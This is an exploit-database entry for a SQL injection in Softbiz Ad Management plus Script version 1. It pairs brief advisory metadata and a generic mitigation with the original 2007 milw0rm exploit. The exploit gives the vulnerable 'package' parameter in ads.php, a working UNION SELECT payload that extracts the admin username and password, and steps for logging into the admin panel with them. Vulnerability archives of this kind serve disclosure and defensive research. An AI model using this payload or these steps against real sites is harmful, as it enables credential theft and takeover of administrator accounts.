Softbiz Ad Management plus Script ver 1 SQL INJECTION

vendor:

Ad Management plus Script

by:

IRCRASH (Dr.Crash)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Ad Management plus Script

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Softbiz Ad Management plus Script ver 1 SQL INJECTION

The Softbiz Ad Management plus Script version 1 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting SQL code through the 'package' parameter in the 'ads.php' file. By using a specific SQL code, the attacker can retrieve sensitive information such as the admin username and password.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before executing any SQL queries. Additionally, the software should be kept up to date with the latest patches and security updates.

Source

Exploit-DB raw data:

#####################################################################################
####            Softbiz Ad Management plus Script ver 1 SQL INJECTION            ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#                                                                                   #
#                                                                                   #
#####################################################################################
#Injection Adress : http://sitename/ads.php?package=<SQL C0de>                      #
#                                                                                   #
#SQL C0de : 999999%20union/**/select/**/1,2,3,4,5,admin_name,pwd,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/from/**/sbbanners_admin/*
#                                                                                   #
#####################################################################################
#Help :                                                                             #
#                                                                                   #
#Step 1 : Register in Site                                                          #
#Step 2 : Login in User panel with your email and password                          #
#Step 3 : Go too Sql address and find admin username and password                   #
#Step 4 : Go too http://sitename/admin/ and login with admin username and password  #
#Step 5 :  :)                                                                         #
#                                                                                   #
#####################################################################################
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-11-11]